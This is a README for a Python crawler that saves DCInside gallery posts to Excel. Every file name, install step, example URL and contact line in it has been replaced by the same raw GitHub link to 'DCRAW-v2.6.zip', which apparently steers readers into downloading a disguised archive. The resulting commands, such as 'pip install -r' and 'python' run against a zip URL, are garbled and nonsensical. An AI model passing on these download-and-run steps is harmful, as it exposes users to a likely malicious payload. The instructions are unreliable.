A flexible Python script to crawl posts from DCInside galleries and save the data to an Excel file.
- Crawl Any Gallery: Works with regular, minor (
mgallery), and mini (mini) galleries. - Page Range Selection: Specify exactly which pages you want to crawl (e.g., pages 1 through 5).
- Keyword Filtering: Filter posts by a specific keyword in the title.
- Data Cleaning: Automatically removes advertisements and other non-post entries to ensure clean data.
- Excel Export: Saves the extracted data (Number, Title, Author, Views, Link, Liked) into a clean
.xlsxfile named after the gallery ID.
- Python 3.x
- The libraries listed in
https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip.
-
Clone the repository or download the files.
-
Install the required packages using pip:
pip install -r https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip
The script is run from the command line with arguments specifying the target gallery and pages.
python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l <URL> -p <PAGE_RANGE> [OPTIONS]| Argument | Short Form | Description | Required |
|---|---|---|---|
--link |
-l |
The full URL of the gallery board list. | Yes |
--pages |
-p |
The range of pages to crawl (e.g., "1-5"). Defaults to "1-100" if not provided. | No |
--search-word |
-S |
An optional keyword to filter posts by their title. | No |
--liked-number |
-L |
Filter posts by an exact number of likes. | No |
--liked-number-over |
Filter posts by a number of likes greater than the specified value. | No |
-
Basic Crawling To crawl pages 1 through 3 of the 'record' minor gallery:
python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-3
-
Crawling with a Search Filter To crawl the first 10 pages of the 'record' gallery and only save posts with the word "녹화" in the title:
python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-10 -S "녹화" -
Crawling with Liked Number Filter (Exact) To crawl the first 5 pages and only get posts with exactly 10 likes:
python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-5 -L 10
-
Crawling with Liked Number Filter (Over) To crawl the first 5 pages and only get posts with more than 5 likes:
python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-5 --liked-number-over 5
-
Crawling without Page Range (Defaults to 1-100) To crawl the first 100 pages of the 'record' gallery:
python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip
This project is licensed under the MIT License.
This tool is intended for educational purposes only. Please ensure that you have the right to crawl the target website and that you are not violating any terms of service. The user of this script is solely responsible for any legal consequences that may arise from its use.
For any questions or feedback, please contact https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip.